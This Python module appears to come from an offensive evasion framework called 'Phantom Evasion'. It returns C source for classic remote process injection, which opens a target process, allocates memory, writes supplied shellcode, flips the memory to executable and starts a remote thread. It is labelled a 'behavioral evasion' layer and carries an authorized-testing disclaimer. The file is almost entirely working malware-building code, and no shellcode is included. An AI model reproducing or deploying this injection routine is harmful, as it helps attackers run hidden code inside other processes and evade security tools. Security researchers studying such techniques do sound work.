"""
Phantom Evasion - Classic Process Injection

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_classic_injection() -> Dict[str, Any]:
    """Generate C code for classic remote process injection.

    Steps:
        1. ``OpenProcess`` – obtain a handle to the target process.
        2. ``VirtualAllocEx`` – allocate RWX memory in the remote process.
        3. ``WriteProcessMemory`` – copy shellcode into the allocation.
        4. ``VirtualProtectEx`` – change protection to RX (W^X).
        5. ``CreateRemoteThread`` – start a thread at the shellcode address.
        6. ``WaitForSingleObject`` / ``CloseHandle`` – clean up.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_CLASSIC_INJ_DEFINED__
#define __PHANTOM_CLASSIC_INJ_DEFINED__
// Classic Remote Process Injection – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// VirtualAllocEx + WriteProcessMemory + CreateRemoteThread injection.

#include <windows.h>
#include <stdio.h>

static BOOL classic_inject(DWORD pid,
                            unsigned char *shellcode,
                            size_t shellcode_len) {
    HANDLE hProcess = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD,
        FALSE, pid);
    if (!hProcess) return FALSE;

    // Allocate RW memory in the target process
    LPVOID remote_addr = VirtualAllocEx(hProcess, NULL, shellcode_len,
                                        MEM_COMMIT | MEM_RESERVE,
                                        PAGE_READWRITE);
    if (!remote_addr) {
        CloseHandle(hProcess);
        return FALSE;
    }

    // Write shellcode
    SIZE_T written = 0;
    if (!WriteProcessMemory(hProcess, remote_addr, shellcode,
                             shellcode_len, &written) ||
        written != shellcode_len) {
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Change to RX (Write ^ Execute)
    DWORD old_protect = 0;
    VirtualProtectEx(hProcess, remote_addr, shellcode_len,
                     PAGE_EXECUTE_READ, &old_protect);

    // Create remote thread pointing at shellcode
    HANDLE hThread = CreateRemoteThread(
        hProcess, NULL, 0,
        (LPTHREAD_START_ROUTINE)remote_addr, NULL, 0, NULL);
    if (!hThread) {
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    CloseHandle(hProcess);
    return TRUE;
}
#endif /* __PHANTOM_CLASSIC_INJ_DEFINED__ */
"""

    return {
        "code": code,
        "description": "Classic injection: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread",
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "classic_injection",
    }
